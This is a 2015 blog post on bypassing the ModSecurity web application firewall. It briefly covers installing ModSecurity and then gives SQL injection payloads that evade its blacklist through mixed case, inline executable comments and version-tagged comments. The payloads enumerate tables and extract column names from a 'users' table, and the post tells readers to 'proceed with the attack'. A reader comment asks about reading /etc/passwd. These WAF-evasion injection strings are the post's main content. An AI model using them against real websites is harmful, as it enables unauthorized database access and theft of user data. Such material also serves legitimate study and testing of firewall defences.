Saturday, 25 July 2015

How to Bypass Mod Security WAF | Rahul Tyagi

Introduction to Web Application Firewall and IDS and IPS
Web Application Firewall : When a web site owner deploy a application software containing all kind of attack database in it and filter the request deployed by the vistor , then we can say that the application which is deployed on the website is web application firewall.

Types of WAF
Software WAF: These are the firewall technologies which are just like a software application can be installed on the web server and hence can be used to filter the requested contents.

Linux   :  Mod Security : Free | Paid :.php
Windows :  Dot Defender  : Paid :. asp aspx

Mod Security : Mod Security comes to picture in early 2008 when hackers are on the peak and defacing websites all over the world. This was era when there are many paid firewalls but there was no solution for the middle level organizations.

Mod Security came and gives a little hope to web site owners that it will protect website from hackers.

1. Attack database was limited.
2. Open source but lack of funding.

OWASP TOP 10 Attack they made open call to hackers and made a huge database of available attacks for web application.

How to Install Mod Security on Ubuntu
$ sudo apt-get install libapache2-mod-security
$ sudo a2enmod mod-security
$ sudo /etc/init.d/apache2 force-reload

Understanding the working of WAF
Every WAF works on two principal formats first White List and Black List filtration.

Black List : It's the second way of securing the website hence it will be having a database of all the non sense attacks especially string based ( order by ), (union all select) etc etc etc.Hence any request carrying this kind of string from VISITOR will be get filtered by the blacklist and in response will block if match with any string from the list.

How to Configure Your Mod Security in Ubuntu After Installation
sudo gedit /etc/apache2/sites-available/000-default.conf

After opening this file i.e 000-default.conf we have to change the IP address of the server or the website name whose traffic which we want to filter from mod security.

Bypassing WAF Validations and Filtration

1. Upper Lower Case Method

union all select : UnIoN aLl SeLeCt' UnIoN SeLeCt 1,2--+&Submit=Submit#

Inline Comments : /*     */

2. Inline Executable Comments

Step 1: Get the tables from the database' /*!UnIoN*/+/*!aLl*/+/*!SeLeCt*/ 1,2--+&Submit=Submit#

Target Table is users

Step 2: Get the columns' /*!UnIoN*/+/*!aLl*/+/*!SeLeCt*/ 1,column_name from information_schema.columns where table_name='users'--+&Submit=Submit#

Version Based Inline Executable Comments
5.00.00 --> 50000
4.00.00 --> 40000
3.00.00 --> 30000
2.00.00 --> 20000
1.00.00 --> 10000

/*!50000UnIoN*/ + /*!50000aLl*/+/*!50000SeLeCt*/

Step 3:' /*!50000UnIoN*/+/*!50000aLl*/+/*!50000SeLeCt*/ 1,column_name from information_schema.columns where table_name='users'--+&Submit=Submit#

Note: Do the same thing with all the query words and proceed with the attack.

  • Stumble This
  • Fav This With Technorati
  • Add To
  • Digg This
  • Add To Facebook
  • Add To Yahoo


Unknown said...

what about php code? such as php info or /etc/passwd

Post a Comment